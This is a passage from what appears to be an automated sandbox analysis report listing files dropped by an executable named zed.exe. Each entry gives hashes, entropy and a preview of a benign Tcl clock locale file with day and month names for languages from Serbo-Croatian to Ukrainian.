                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1255
                                                                                                                                                                                                                                            Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                                            MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                                            SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                                            SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                                            SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                                                                            Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                                            MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                                            SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                                            SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                                            SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1321
                                                                                                                                                                                                                                            Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                                            MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                                            SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                                            SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                                            SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2087
                                                                                                                                                                                                                                            Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                                            MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                                            SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                                            SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                                            SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1219
                                                                                                                                                                                                                                            Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                                            MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                                            SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                                            SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                                            SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1040
                                                                                                                                                                                                                                            Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                                            MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                                            SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                                            SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                                            SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1874
                                                                                                                                                                                                                                            Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                                            MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                                            SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                                            SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                                            SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                                            MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                                            SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                                            SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                                            SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2149
                                                                                                                                                                                                                                            Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                                            MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                                            SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                                            SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                                            SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):419
                                                                                                                                                                                                                                            Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                                            MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                                            SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                                            SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                                            SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2359
                                                                                                                                                                                                                                            Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                                            MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                                            SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                                            SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                                            SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1183
                                                                                                                                                                                                                                            Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                                            MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                                            SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                                            SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                                            SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2165
                                                                                                                                                                                                                                            Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                                            MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                                            SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                                            SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                                            SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
